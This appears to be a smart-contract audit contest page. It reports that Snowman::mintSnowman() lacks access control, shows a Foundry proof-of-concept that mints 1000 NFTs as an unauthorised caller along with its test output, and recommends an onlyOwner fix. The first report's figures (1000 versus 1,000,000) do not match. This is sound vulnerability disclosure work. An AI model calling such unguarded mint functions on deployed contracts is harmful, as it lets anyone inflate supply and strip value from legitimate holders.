Snowman::mintSnowman() has no access control allowing anyone to mint unlimited NFTs
Root + Impact
Description
In the Snowman Merkle Airdrop protocol, Snowman NFTs are intended to be distributed exclusively through the SnowmanAirdrop contract. The expected flow is: users earn or buy Snow (ERC20) tokens, then claim Snowman (ERC721) NFTs by providing a valid Merkle proof and signature via SnowmanAirdrop::claimSnowman(). This mechanism ensures only eligible users who have staked Snow tokens receive Snowman NFTs.
However, the Snowman::mintSnowman() function in Snowman.sol (line 36) is declared as external with zero access control. There is no onlyOwner modifier, no role-based access check, and no allowlist restricting who can call it. This means any external account can directly call mintSnowman() to mint an arbitrary number of Snowman NFTs to any address, completely bypassing the Merkle proof verification, signature validation, and Snow token staking requirements enforced by SnowmanAirdrop.
The root cause is the missing access control on the mint function:
The impact is critical: the entire airdrop system (Merkle proofs, signatures, Snow token staking) is rendered meaningless since attackers can obtain NFTs without any prerequisites. This destroys the economic value of both the Snow token and Snowman NFT.
Risk
Likelihood: High
Any external user can call
Snowman::mintSnowman()directly at any time with no restrictionsThe function is publicly visible on the blockchain and requires no special conditions, timing, or privileges to exploit
Automated bots can discover and exploit this immediately after deployment
Impact: High
An attacker can mint unlimited Snowman NFTs to their own address or any address, inflating supply to infinity
The Merkle-based airdrop mechanism in
SnowmanAirdropbecomes entirely pointless since NFTs can be obtained for freeThe economic value of Snowman NFTs is destroyed due to unlimited supply
The Snow token loses its utility since staking is no longer required to obtain Snowman NFTs
Legitimate users who earned or purchased Snow tokens and went through the proper claim process are disadvantaged
Proof of Concept
The following Foundry test demonstrates that an attacker with no Snow tokens, no Merkle proof, and no signature can mint 1000 Snowman NFTs directly. Place this test in the existing test file and run with forge test --mt testExploit_AnyoneCanMintUnlimitedNFTs -vvv:
Step-by-step exploit:
Attacker deploys no contracts and holds no tokens
Attacker calls
snowman.mintSnowman(attackerAddress, 1000000)directly1,000,000 Snowman NFTs are minted to the attacker's address
The attacker can sell these on secondary markets before legitimate users claim theirs
Recommended Mitigation
Add an access control mechanism that restricts minting to only the SnowmanAirdrop contract. The recommended approach is to store the airdrop contract address and add a modifier:
Note: The contract already defines an SM__NotAllowed() error that is currently unused, suggesting this access control was intended but not implemented.
Lead Judging Commences
[H-01] Unrestricted NFT Minting in Snowman.sol
# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.